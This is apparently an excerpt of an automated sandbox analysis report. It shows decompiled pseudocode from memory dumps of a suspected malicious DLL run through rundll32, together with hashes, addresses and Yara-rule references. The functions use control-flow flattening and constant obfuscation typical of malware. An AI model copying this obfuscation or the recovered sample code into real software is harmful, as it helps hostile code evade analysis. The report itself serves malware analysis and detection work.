                                                                                                                    			E00349BCF() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				unsigned int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				void* _t118;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int* _t136;

				_t136 =  &_v568;
				_v560 = 0x297e3c;
				_v560 = _v560 >> 9;
				_t118 = 0x4ead2fe;
				_v560 = _v560 + 0xe8be;
				_v560 = _v560 ^ 0xc9c09221;
				_v560 = _v560 ^ 0xc9c20db8;
				_v540 = 0x190e1d;
				_v540 = _v540 >> 7;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000cdd3b;
				_v544 = 0x86c2f0;
				_v544 = _v544 | 0x0d7eac20;
				_v544 = _v544 ^ 0xe6b61282;
				_v544 = _v544 ^ 0xeb41e563;
				_v552 = 0x262f60;
				_v552 = _v552 ^ 0x76c91adc;
				_v552 = _v552 + 0xd1c5;
				_v552 = _v552 ^ 0x76fc323e;
				_v524 = 0xf427e0;
				_v524 = _v524 + 0xffff22a3;
				_v524 = _v524 ^ 0x00f85f52;
				_v548 = 0xdbc1a5;
				_v548 = _v548 >> 0xb;
				_v548 = _v548 + 0xf615;
				_v548 = _v548 ^ 0x0006ff3e;
				_v556 = 0xd2f840;
				_v556 = _v556 * 0x5f;
				_t134 = 0;
				_v556 = _v556 ^ 0x4e4cccaa;
				_v568 = 0x74ecfa;
				_t132 = 0x53;
				_t133 = _v556;
				_v568 = _v568 / _t132;
				_v568 = _v568 ^ 0xc72664ff;
				_v568 = _v568 << 0xf;
				_v568 = _v568 ^ 0x862d9f40;
				_v536 = 0xc0d44a;
				_v536 = _v536 + 0x396d;
				_t135 = _v556;
				_t117 = _v556;
				_v536 = _v536 * 0x46;
				_v536 = _v536 ^ 0x34c6c601;
				_v532 = 0xf37e83;
				_v532 = _v532 << 8;
				_v532 = _v532 | 0x760e0a19;
				_v532 = _v532 ^ 0xf77c332a;
				_v528 = 0x91f8e3;
				_v528 = _v528 ^ 0xc904aca2;
				_v528 = _v528 ^ 0xc9900919;
				do {
					while(_t118 != 0x27fe330) {
						if(_t118 == 0x4ead2fe) {
							_t118 = 0x96d401d;
							continue;
						} else {
							if(_t118 == 0x7ac597b) {
								_t117 = E0033B6CF( &_v520, _v548, _v556, _v568);
								_t118 = 0xa7595e6;
								continue;
							} else {
								if(_t118 == 0x80b0e4e) {
									_t90 =  &_v552; // 0xeb41e563
									_t111 = E00339B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
									_t136 =  &(_t136[4]);
									__eflags = _t111;
									if(__eflags != 0) {
										_t118 = 0x7ac597b;
										continue;
									}
								} else {
									if(_t118 == 0x96d401d) {
										_t115 = E003352C2();
										_t133 = _t115;
										__eflags = _t115;
										if(__eflags != 0) {
											_t118 = 0x80b0e4e;
											continue;
										}
									} else {
										if(_t118 != 0xa7595e6) {
											goto L15;
										} else {
											_t135 = E00332051(_v532, _t117, _v528);
											_t118 = 0x27fe330;
											continue;
										}
									}
								}
							}
						}
						goto L16;
					}
					_v564 = 0x69bdc3;
					_v564 = _v564 | 0xfd1bce6c;
					_v564 = _v564 ^ 0xf153ffb6;
					_v564 = _v564 ^ 0x260f00bb;
					__eflags = _t135 - _v564;
					_t134 =  ==  ? 1 : _t134;
					_t118 = 0x8b668cc;
					L15:
					__eflags = _t118 - 0x8b668cc;
				} while (__eflags != 0);
				L16:
				return _t134;
			}
























                                                                                                                    0x00349bcf
                                                                                                                    0x00349bd9
                                                                                                                    0x00349be3
                                                                                                                    0x00349be8
                                                                                                                    0x00349bed
                                                                                                                    0x00349bf5
                                                                                                                    0x00349bfd
                                                                                                                    0x00349c05
                                                                                                                    0x00349c0d
                                                                                                                    0x00349c12
                                                                                                                    0x00349c17
                                                                                                                    0x00349c1f
                                                                                                                    0x00349c27
                                                                                                                    0x00349c2f
                                                                                                                    0x00349c37
                                                                                                                    0x00349c3f
                                                                                                                    0x00349c47
                                                                                                                    0x00349c4f
                                                                                                                    0x00349c57
                                                                                                                    0x00349c5f
                                                                                                                    0x00349c67
                                                                                                                    0x00349c6f
                                                                                                                    0x00349c77
                                                                                                                    0x00349c7f
                                                                                                                    0x00349c84
                                                                                                                    0x00349c8c
                                                                                                                    0x00349c94
                                                                                                                    0x00349ca1
                                                                                                                    0x00349ca5
                                                                                                                    0x00349ca7
                                                                                                                    0x00349caf
                                                                                                                    0x00349cbd
                                                                                                                    0x00349cc0
                                                                                                                    0x00349cc4
                                                                                                                    0x00349cc8
                                                                                                                    0x00349cd0
                                                                                                                    0x00349cd5
                                                                                                                    0x00349cdd
                                                                                                                    0x00349ce5
                                                                                                                    0x00349cf2
                                                                                                                    0x00349cf6
                                                                                                                    0x00349cfa
                                                                                                                    0x00349cfe
                                                                                                                    0x00349d06
                                                                                                                    0x00349d0e
                                                                                                                    0x00349d13
                                                                                                                    0x00349d1b
                                                                                                                    0x00349d23
                                                                                                                    0x00349d2b
                                                                                                                    0x00349d33
                                                                                                                    0x00349d3b
                                                                                                                    0x00349d3b
                                                                                                                    0x00349d4d
                                                                                                                    0x00349e02
                                                                                                                    0x00000000
                                                                                                                    0x00349d53
                                                                                                                    0x00349d59
                                                                                                                    0x00349df6
                                                                                                                    0x00349df8
                                                                                                                    0x00000000
                                                                                                                    0x00349d5f
                                                                                                                    0x00349d65
                                                                                                                    0x00349dc1
                                                                                                                    0x00349dc9
                                                                                                                    0x00349dce
                                                                                                                    0x00349dd1
                                                                                                                    0x00349dd3
                                                                                                                    0x00349dd5
                                                                                                                    0x00000000
                                                                                                                    0x00349dd5
                                                                                                                    0x00349d67
                                                                                                                    0x00349d6d
                                                                                                                    0x00349da0
                                                                                                                    0x00349da5
                                                                                                                    0x00349da7
                                                                                                                    0x00349da9
                                                                                                                    0x00349daf
                                                                                                                    0x00000000
                                                                                                                    0x00349daf
                                                                                                                    0x00349d6f
                                                                                                                    0x00349d75
                                                                                                                    0x00000000
                                                                                                                    0x00349d7b
                                                                                                                    0x00349d8f
                                                                                                                    0x00349d91
                                                                                                                    0x00000000
                                                                                                                    0x00349d91
                                                                                                                    0x00349d75
                                                                                                                    0x00349d6d
                                                                                                                    0x00349d65
                                                                                                                    0x00349d59
                                                                                                                    0x00000000
                                                                                                                    0x00349d4d
                                                                                                                    0x00349e0c
                                                                                                                    0x00349e16
                                                                                                                    0x00349e1f
                                                                                                                    0x00349e27
                                                                                                                    0x00349e33
                                                                                                                    0x00349e35
                                                                                                                    0x00349e38
                                                                                                                    0x00349e3d
                                                                                                                    0x00349e3d
                                                                                                                    0x00349e3d
                                                                                                                    0x00349e4a
                                                                                                                    0x00349e55

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: <~)$`/&$cA$m9
                                                                                                                    • API String ID: 0-2671356241
                                                                                                                    • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                    • Instruction ID: 1bcebcd9a6c1b6e2f6bd45703d193dc1756e84c29407758e3ab55e3457a7e2e2
                                                                                                                    • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                    • Instruction Fuzzy Hash: E151637100C3019FC399CE21D49942BBBE1FFD8758F501E1EF5A69A264C7B4DA498F92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                    • GetACP.KERNEL32 ref: 1004377E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4232894706-0
                                                                                                                    • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                    • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                    • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                    • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                    • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                    • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                    • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00340E53 Relevance: 4.1, Strings: 3, Instructions: 343COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00340E53(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t406;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t435;
				void* _t467;
				void* _t468;
				signed int* _t472;

				_t472 =  &_v2772;
				_v2700 = 0xd36ba7;
				_v2700 = _v2700 << 7;
				_v2700 = _v2700 ^ 0xaed70c65;
				_v2700 = _v2700 ^ 0xc762dfcc;
				_v2652 = 0x6f4609;
				_t9 =  &_v2652; // 0x6f4609
				_v2652 =  *_t9 * 0x1c;
				_t467 = __ecx;
				_v2652 = _v2652 ^ 0x0c23569d;
				_t468 = 0xea1969c;
				_v2608 = 0xb8394b;
				_v2608 = _v2608 + 0xaeb5;
				_v2608 = _v2608 ^ 0x00b390c3;
				_v2736 = 0x3d33f1;
				_v2736 = _v2736 + 0xffffd537;
				_v2736 = _v2736 + 0xffffb6ee;
				_v2736 = _v2736 + 0xbad8;
				_v2736 = _v2736 ^ 0x003e0409;
				_v2768 = 0xd1d4ce;
				_v2768 = _v2768 >> 0xc;
				_v2768 = _v2768 ^ 0xb5c37fe4;
				_v2768 = _v2768 + 0x4eb3;
				_v2768 = _v2768 ^ 0xb5c2c9c4;
				_v2760 = 0x157bbd;
				_v2760 = _v2760 ^ 0x6d7617e7;
				_v2760 = _v2760 ^ 0x1b56cd2f;
				_v2760 = _v2760 ^ 0xfb63426d;
				_v2760 = _v2760 ^ 0x8d577604;
				_v2604 = 0x1fac8b;
				_v2604 = _v2604 + 0x9962;
				_v2604 = _v2604 ^ 0x0029d956;
				_v2696 = 0x3d46b4;
				_v2696 = _v2696 | 0x3d7fd3ff;
				_v2696 = _v2696 ^ 0x3d7bd02d;
				_v2720 = 0xad1695;
				_t426 = 9;
				_v2720 = _v2720 * 0x4b;
				_v2720 = _v2720 >> 0x10;
				_v2720 = _v2720 << 0xe;
				_v2720 = _v2720 ^ 0x0cab1f79;
				_v2644 = 0xe14118;
				_v2644 = _v2644 ^ 0x82369820;
				_v2644 = _v2644 ^ 0x82de8a4e;
				_v2668 = 0x391c30;
				_v2668 = _v2668 >> 7;
				_v2668 = _v2668 + 0xffff3589;
				_v2668 = _v2668 ^ 0xfff6d862;
				_v2692 = 0x9dbc3;
				_v2692 = _v2692 << 8;
				_v2692 = _v2692 * 0x75;
				_v2692 = _v2692 ^ 0x81749ad9;
				_v2660 = 0x144a46;
				_v2660 = _v2660 >> 0xd;
				_v2660 = _v2660 ^ 0x0008b8c7;
				_v2752 = 0x703c03;
				_v2752 = _v2752 * 0x74;
				_v2752 = _v2752 ^ 0x2e54cb21;
				_v2752 = _v2752 | 0x6f17e683;
				_v2752 = _v2752 ^ 0x7f96e2f0;
				_v2676 = 0xa438e5;
				_v2676 = _v2676 / _t426;
				_v2676 = _v2676 + 0x92ff;
				_v2676 = _v2676 ^ 0x0015b827;
				_v2612 = 0x1c48b9;
				_t427 = 0x1a;
				_v2612 = _v2612 / _t427;
				_v2612 = _v2612 ^ 0x000154fb;
				_v2628 = 0x490198;
				_v2628 = _v2628 | 0x561f6486;
				_v2628 = _v2628 ^ 0x565ec1b9;
				_v2616 = 0xcec4ed;
				_t428 = 0x3d;
				_v2616 = _v2616 * 9;
				_v2616 = _v2616 ^ 0x074f393e;
				_v2636 = 0x4be85b;
				_v2636 = _v2636 >> 1;
				_v2636 = _v2636 ^ 0x002afd34;
				_v2728 = 0xca47ed;
				_v2728 = _v2728 << 1;
				_v2728 = _v2728 / _t428;
				_v2728 = _v2728 >> 3;
				_v2728 = _v2728 ^ 0x00084593;
				_v2620 = 0x793301;
				_v2620 = _v2620 | 0xccc0d5da;
				_v2620 = _v2620 ^ 0xccf56683;
				_v2684 = 0xd6c9e7;
				_v2684 = _v2684 >> 8;
				_v2684 = _v2684 + 0x30fc;
				_v2684 = _v2684 ^ 0x000dbf27;
				_v2656 = 0x6cf887;
				_v2656 = _v2656 | 0x54469415;
				_v2656 = _v2656 ^ 0x5469dd96;
				_v2712 = 0x1ba43e;
				_v2712 = _v2712 + 0xffff54b6;
				_v2712 = _v2712 >> 0x10;
				_v2712 = _v2712 ^ 0x536d0b9d;
				_v2712 = _v2712 ^ 0x5368fd88;
				_v2744 = 0x7fa81e;
				_v2744 = _v2744 + 0x45dd;
				_v2744 = _v2744 | 0xcc5c3b14;
				_t429 = 0x76;
				_v2744 = _v2744 * 0x48;
				_v2744 = _v2744 ^ 0x83f6fb81;
				_v2704 = 0x73cce1;
				_v2704 = _v2704 >> 6;
				_v2704 = _v2704 | 0x0e0742c3;
				_v2704 = _v2704 ^ 0x0e0521c8;
				_v2764 = 0x3737a7;
				_v2764 = _v2764 >> 0xb;
				_v2764 = _v2764 << 3;
				_v2764 = _v2764 + 0x14ac;
				_v2764 = _v2764 ^ 0x0004654a;
				_v2772 = 0xaeb57f;
				_v2772 = _v2772 / _t429;
				_v2772 = _v2772 << 0xf;
				_t430 = 0x37;
				_v2772 = _v2772 / _t430;
				_v2772 = _v2772 ^ 0x037ee988;
				_v2648 = 0x954498;
				_t431 = 0x4b;
				_v2648 = _v2648 / _t431;
				_v2648 = _v2648 ^ 0x00054dec;
				_v2640 = 0x8be41e;
				_v2640 = _v2640 >> 0xd;
				_v2640 = _v2640 ^ 0x00089615;
				_v2748 = 0xfabe1b;
				_v2748 = _v2748 ^ 0xff42a680;
				_v2748 = _v2748 + 0xffff8ee7;
				_v2748 = _v2748 + 0x1c5a;
				_v2748 = _v2748 ^ 0xffbaa703;
				_v2756 = 0x33a01d;
				_v2756 = _v2756 * 0x6f;
				_v2756 = _v2756 << 4;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 ^ 0x066d94da;
				_v2672 = 0x7cb69f;
				_v2672 = _v2672 << 4;
				_v2672 = _v2672 * 0x4a;
				_v2672 = _v2672 ^ 0x40c5c2d0;
				_v2680 = 0xc0e1f8;
				_v2680 = _v2680 << 1;
				_v2680 = _v2680 | 0xa5ca1830;
				_v2680 = _v2680 ^ 0xa5ca6401;
				_v2732 = 0xd52773;
				_v2732 = _v2732 ^ 0x8b84e9f5;
				_v2732 = _v2732 + 0xffffa58a;
				_v2732 = _v2732 >> 1;
				_v2732 = _v2732 ^ 0x45a69f9f;
				_v2740 = 0x525c84;
				_v2740 = _v2740 * 0x45;
				_v2740 = _v2740 << 0xd;
				_v2740 = _v2740 + 0xffffe485;
				_v2740 = _v2740 ^ 0x5df42895;
				_v2688 = 0x8afd1b;
				_v2688 = _v2688 >> 0xa;
				_v2688 = _v2688 * 0x44;
				_v2688 = _v2688 ^ 0x000c822b;
				_v2632 = 0xb6ec99;
				_v2632 = _v2632 + 0xffff2a9a;
				_v2632 = _v2632 ^ 0x00b1db1a;
				_v2664 = 0xfa37e2;
				_v2664 = _v2664 * 0x4c;
				_v2664 = _v2664 + 0x9251;
				_v2664 = _v2664 ^ 0x4a4e0c53;
				_v2708 = 0xf9311d;
				_v2708 = _v2708 >> 2;
				_t406 = _v2708 * 0x30;
				_v2708 = _t406;
				_v2708 = _v2708 + 0xffffde46;
				_v2708 = _v2708 ^ 0x0bad021b;
				_v2624 = 0x51d14;
				_v2624 = _v2624 | 0x271919e8;
				_v2624 = _v2624 ^ 0x2716653c;
				_v2716 = 0x708eea;
				_v2716 = _v2716 + 0xfffff8d8;
				_v2716 = _v2716 | 0x4ca3cf3c;
				_v2716 = _v2716 ^ 0x396f5f4d;
				_v2716 = _v2716 ^ 0x7599e4cd;
				_v2724 = 0x3acc77;
				_v2724 = _v2724 + 0x56d;
				_v2724 = _v2724 + 0xb0bb;
				_v2724 = _v2724 + 0xffffce89;
				_v2724 = _v2724 ^ 0x003c4612;
				while(_t468 != 0x5de06da) {
					if(_t468 == 0xea1969c) {
						_t468 = 0xfa9128f;
						continue;
					} else {
						_t480 = _t468 - 0xfa9128f;
						if(_t468 != 0xfa9128f) {
							L8:
							__eflags = _t468 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0034DA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
							 *((short*)(E0033B6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
							E00338969(_v2720,  &_v1560, _t480, _v2644, _v2668);
							_push(_v2752);
							_push(_v2660);
							E003347CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E0034DCF7(_v2692, 0x331308, _t480),  &_v1560, _v2616, _v2636);
							E0033A8B0(_v2728, _t419, _v2620);
							_t431 = _v2684;
							_t406 = E0033EA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
							_t472 =  &(_t472[0x17]);
							if(_t406 != 0) {
								_t468 = 0x5de06da;
								continue;
							}
						}
					}
					return _t406;
				}
				_push(_v2648);
				_push(_v2700);
				_push(_v2772);
				_push( &_v1040);
				E003446BB(_v2704, _v2764);
				_push(_v2756);
				_push(_v2748);
				E003347CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E0034DCF7(_v2640, 0x3313b8, __eflags),  &_v2080, _v2740, _v2688);
				_t435 = _v2632;
				E0033A8B0(_t435, _t409, _v2664);
				__eflags = 0;
				_push(_v2724);
				_push(0);
				_push(_t435);
				_push(0);
				_push(0);
				_push(_v2716);
				_t431 = _v2708;
				_push( &_v520);
				_t406 = E0033AB87(_v2708, _v2624, 0);
				_t472 = _t472 - 0xc + 0x64;
				_t468 = 0xa8e801c;
				goto L8;
			}





























































                                                                                                                    0x00340e53
                                                                                                                    0x00340e59
                                                                                                                    0x00340e63
                                                                                                                    0x00340e68
                                                                                                                    0x00340e70
                                                                                                                    0x00340e78
                                                                                                                    0x00340e80
                                                                                                                    0x00340e89
                                                                                                                    0x00340e90
                                                                                                                    0x00340e92
                                                                                                                    0x00340e9d
                                                                                                                    0x00340ea2
                                                                                                                    0x00340ead
                                                                                                                    0x00340eb8
                                                                                                                    0x00340ec3
                                                                                                                    0x00340ecb
                                                                                                                    0x00340ed3
                                                                                                                    0x00340edb
                                                                                                                    0x00340ee3
                                                                                                                    0x00340eeb
                                                                                                                    0x00340ef3
                                                                                                                    0x00340ef8
                                                                                                                    0x00340f00
                                                                                                                    0x00340f08
                                                                                                                    0x00340f10
                                                                                                                    0x00340f18
                                                                                                                    0x00340f20
                                                                                                                    0x00340f28
                                                                                                                    0x00340f30
                                                                                                                    0x00340f38
                                                                                                                    0x00340f43
                                                                                                                    0x00340f4e
                                                                                                                    0x00340f59
                                                                                                                    0x00340f61
                                                                                                                    0x00340f69
                                                                                                                    0x00340f71
                                                                                                                    0x00340f80
                                                                                                                    0x00340f83
                                                                                                                    0x00340f87
                                                                                                                    0x00340f8c
                                                                                                                    0x00340f91
                                                                                                                    0x00340f99
                                                                                                                    0x00340fa4
                                                                                                                    0x00340faf
                                                                                                                    0x00340fba
                                                                                                                    0x00340fc2
                                                                                                                    0x00340fc7
                                                                                                                    0x00340fcf
                                                                                                                    0x00340fd7
                                                                                                                    0x00340fdf
                                                                                                                    0x00340fe9
                                                                                                                    0x00340fed
                                                                                                                    0x00340ff5
                                                                                                                    0x00341000
                                                                                                                    0x00341008
                                                                                                                    0x00341013
                                                                                                                    0x00341020
                                                                                                                    0x00341024
                                                                                                                    0x0034102c
                                                                                                                    0x00341034
                                                                                                                    0x0034103c
                                                                                                                    0x0034104c
                                                                                                                    0x00341050
                                                                                                                    0x00341058
                                                                                                                    0x00341060
                                                                                                                    0x00341072
                                                                                                                    0x00341075
                                                                                                                    0x0034107c
                                                                                                                    0x00341089
                                                                                                                    0x00341094
                                                                                                                    0x0034109f
                                                                                                                    0x003410aa
                                                                                                                    0x003410bf
                                                                                                                    0x003410c2
                                                                                                                    0x003410c9
                                                                                                                    0x003410d4
                                                                                                                    0x003410df
                                                                                                                    0x003410e6
                                                                                                                    0x003410f1
                                                                                                                    0x003410f9
                                                                                                                    0x00341105
                                                                                                                    0x00341109
                                                                                                                    0x0034110e
                                                                                                                    0x00341116
                                                                                                                    0x00341121
                                                                                                                    0x0034112c
                                                                                                                    0x00341137
                                                                                                                    0x0034113f
                                                                                                                    0x00341144
                                                                                                                    0x0034114c
                                                                                                                    0x00341154
                                                                                                                    0x0034115f
                                                                                                                    0x0034116a
                                                                                                                    0x00341175
                                                                                                                    0x0034117d
                                                                                                                    0x00341185
                                                                                                                    0x0034118a
                                                                                                                    0x00341192
                                                                                                                    0x0034119a
                                                                                                                    0x003411a2
                                                                                                                    0x003411aa
                                                                                                                    0x003411b7
                                                                                                                    0x003411ba
                                                                                                                    0x003411be
                                                                                                                    0x003411c6
                                                                                                                    0x003411ce
                                                                                                                    0x003411d3
                                                                                                                    0x003411db
                                                                                                                    0x003411e3
                                                                                                                    0x003411eb
                                                                                                                    0x003411f0
                                                                                                                    0x003411f5
                                                                                                                    0x003411fd
                                                                                                                    0x00341205
                                                                                                                    0x00341215
                                                                                                                    0x00341219
                                                                                                                    0x00341222
                                                                                                                    0x00341227
                                                                                                                    0x0034122d
                                                                                                                    0x00341235
                                                                                                                    0x00341247
                                                                                                                    0x0034124a
                                                                                                                    0x00341251
                                                                                                                    0x0034125c
                                                                                                                    0x00341267
                                                                                                                    0x0034126f
                                                                                                                    0x0034127a
                                                                                                                    0x00341282
                                                                                                                    0x0034128a
                                                                                                                    0x00341292
                                                                                                                    0x0034129a
                                                                                                                    0x003412a7
                                                                                                                    0x003412b9
                                                                                                                    0x003412bd
                                                                                                                    0x003412c2
                                                                                                                    0x003412c7
                                                                                                                    0x003412cf
                                                                                                                    0x003412d7
                                                                                                                    0x003412e1
                                                                                                                    0x003412e5
                                                                                                                    0x003412ed
                                                                                                                    0x003412f5
                                                                                                                    0x003412f9
                                                                                                                    0x00341301
                                                                                                                    0x00341309
                                                                                                                    0x00341311
                                                                                                                    0x00341319
                                                                                                                    0x00341321
                                                                                                                    0x00341325
                                                                                                                    0x0034132d
                                                                                                                    0x0034133a
                                                                                                                    0x0034133e
                                                                                                                    0x00341343
                                                                                                                    0x0034134b
                                                                                                                    0x00341353
                                                                                                                    0x0034135b
                                                                                                                    0x00341365
                                                                                                                    0x00341369
                                                                                                                    0x00341371
                                                                                                                    0x0034137c
                                                                                                                    0x00341387
                                                                                                                    0x00341392
                                                                                                                    0x0034139f
                                                                                                                    0x003413a3
                                                                                                                    0x003413ab
                                                                                                                    0x003413b3
                                                                                                                    0x003413bb
                                                                                                                    0x003413c0
                                                                                                                    0x003413c5
                                                                                                                    0x003413c9
                                                                                                                    0x003413d1
                                                                                                                    0x003413d9
                                                                                                                    0x003413e4
                                                                                                                    0x003413ef
                                                                                                                    0x003413fa
                                                                                                                    0x00341402
                                                                                                                    0x0034140a
                                                                                                                    0x00341412
                                                                                                                    0x0034141a
                                                                                                                    0x00341422
                                                                                                                    0x0034142a
                                                                                                                    0x00341432
                                                                                                                    0x0034143a
                                                                                                                    0x00341442
                                                                                                                    0x0034144a
                                                                                                                    0x00341458
                                                                                                                    0x00341572
                                                                                                                    0x00000000
                                                                                                                    0x0034145e
                                                                                                                    0x0034145e
                                                                                                                    0x00341460
                                                                                                                    0x0034163b
                                                                                                                    0x0034163b
                                                                                                                    0x00341641
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00341466
                                                                                                                    0x00341485
                                                                                                                    0x003414bc
                                                                                                                    0x003414c3
                                                                                                                    0x003414c8
                                                                                                                    0x003414d1
                                                                                                                    0x00341524
                                                                                                                    0x00341536
                                                                                                                    0x00341554
                                                                                                                    0x0034155b
                                                                                                                    0x00341560
                                                                                                                    0x00341565
                                                                                                                    0x0034156b
                                                                                                                    0x00000000
                                                                                                                    0x0034156b
                                                                                                                    0x00341565
                                                                                                                    0x00341460
                                                                                                                    0x00341651
                                                                                                                    0x00341651
                                                                                                                    0x00341579
                                                                                                                    0x00341587
                                                                                                                    0x0034158b
                                                                                                                    0x0034159a
                                                                                                                    0x0034159b
                                                                                                                    0x003415a0
                                                                                                                    0x003415a9
                                                                                                                    0x003415f0
                                                                                                                    0x003415fc
                                                                                                                    0x00341605
                                                                                                                    0x0034160d
                                                                                                                    0x0034160f
                                                                                                                    0x00341613
                                                                                                                    0x00341614
                                                                                                                    0x00341615
                                                                                                                    0x00341616
                                                                                                                    0x00341617
                                                                                                                    0x00341629
                                                                                                                    0x0034162d
                                                                                                                    0x0034162e
                                                                                                                    0x00341633
                                                                                                                    0x00341636
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
